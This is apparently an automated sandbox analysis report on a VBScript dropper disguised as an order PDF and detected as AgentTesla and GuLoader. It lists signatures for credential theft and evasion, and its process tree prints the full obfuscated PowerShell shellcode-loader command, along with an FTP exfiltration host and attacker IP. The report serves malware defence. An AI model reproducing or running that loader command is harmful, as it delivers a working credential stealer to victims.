Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ordine n.47201 pdf.vbs

Overview

General Information

Sample Name:Ordine n.47201 pdf.vbs
Analysis ID:755275
MD5:c8290bc8659c4a6a45ccd1af9268e400
SHA1:d2a97dd4fa44d5e2a568d75b764cc47e5878f960
SHA256:f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
Tags:agentteslavbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 5812 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5780 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5864 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKllHaaUptNa)Co;La[BaDHelNelUnIDimRapChoGrrGetTi(mi`"""cogRadPaiTe3Ba2Ho`"""Un)no]OppSwuWhbXelRuikucBi UnsMatFraJotSoiIscAs SoeWoxPitSyeKvrSenSt DiisanEptDa PaGAfeMbtFlCHylAfiSaptaRCagEnnKa(koiBenPatCa KaRSeuEklEnaYa,PsiSknWatMi BlLNiiKnkInvLa1Bl0Fo4Ru)Sy;Ra[AlDArlAblPrILimBepdeotirSetJa(pa`"""BauPasEdeSkrps3me2Gi`"""De)In]UdpInuBlbuolUniTmcUn FrsVitStaChtNoiBucAn AneTaxEttIneobrTanHj EtiArnSktSn KaGsueChtSnCOpllaiCaeSonNitBuRPaeClcUntUd(DeiCanAstEp UpdSaeGoslu,MiiUmnFotHe WiCMoeAcnGe)Fu;St[EnDFolNdlfrIramZopSkoPlrNitRe(Fu`"""SjkDyeTrrAnnOpePulAc3Un2su`"""Da)Am]RapopuTobFolDaiDrcAu AbsSptBiaCetFuiEncPa PseClxFetSeeMirSynTo GlISunCrtSpPdetPerUn PaESenFauDomAfSUnybasAdtbreUdmDiLStoFacReaGalTreSwsAmWKr(ScuKaiAdnLitUn StvKa1Al,DeiFrnsytTr OovGo2pl)re;ca}bl'Sa;An`$seSretLauKreMeoGarOpgbolKoeKorHusDr3Al=Sr[TrSRetDiuAneRooGrrSkgFolHeePorApsHa1Bl]In:Fl:MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;Dr`$AfmKauGitJeaRitPaiMaoFanBniofsPetPa=Va(SeGPeemotAu-TiILhtSheFemOvPRerHjoStpFleFerHatUnyfe Pl-GuPOuaTjtAphMa Su'ErHUnKSuCMeUCh:Rn\SpNSueStcChrchoInlPeoTeggsiDecSnaAplWi\NaIDagAsnAdoForAreprrOviPenClgDieBerFasUm'Up)An.paSAckChiKlfSernyePrtSt;Pr`$EckUlrTaaUnkUnnRoiBonSggAweSurSmsAf Gl=Pi Rh[OkSAsyFoshytUneChmKo.ToCChoDanAnvMeebarHytVe]Ch:Th:BeFAfrCloMimDeBEnaUdsCieCo6Fo4OtSDitSerSuiAunSugMi(Fa`$EfmSouOvtUdaFitDeiReoMenRiiDosLotor)Re;Sp[FlSGuyUdstatFoeStmMe.WiRSkuDinUntAliMamTieUn.CiIUdnMetskeOvrKooSnpFiSDyeDirCrvMaiFrcFoeInsAl.SyMBeaTeransWrhkoaDelWi]Un:De:SkCAroStpSpyUn(Dr`$UlkCorToaOukFanHeiNonBlgCheSerFasLi,Mi Fl0He,Pa En Pu`$PoSPatDeuKaeBioPurVrgRulSkeOvrIwsIn3ie,To Sk`$MlkRerStaMekFrnRoiConAngSteOprOvsSa.SncCaodeuRanKrtPr)Un;Is[NeSMetebuBeePeoUnrSagOllUdeInrSasSo1Pr]Pe:Pa:SiEKanpiuUkmOpSTyySvsBrtcoeKrmHaLWeoAicLaaKrlWieMiswoWLn(Ba`$SpSDetSpuMaePaoNurUtgInlSaehyrEnsHj3Sc,Bi Kn0Me)Fo#Sk;""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1156 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 4844 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Ordine n.47201 pdf.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa36:$s1: .CreateObject("WScript.Shell")
  • 0x3cde2:$p1: powershell.exe
  • 0x49c55:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        SourceRuleDescriptionAuthorStrings
        amsi64_5812.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
        • 0x1a:$s1: .CreateObject("WScript.Shell")
        • 0x72:$s1: .CreateObject("WScript.Shell")
        • 0x1db:$p1: powershell.exe

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCT
        Timestamp:192.168.2.7185.31.121.13649726613132851779 11/28/22-14:53:16.335427
        SID:2851779
        Source Port:49726
        Destination Port:61313
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.7185.31.121.13649725212029927 11/28/22-14:53:16.290035
        SID:2029927
        Source Port:49725
        Destination Port:21
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link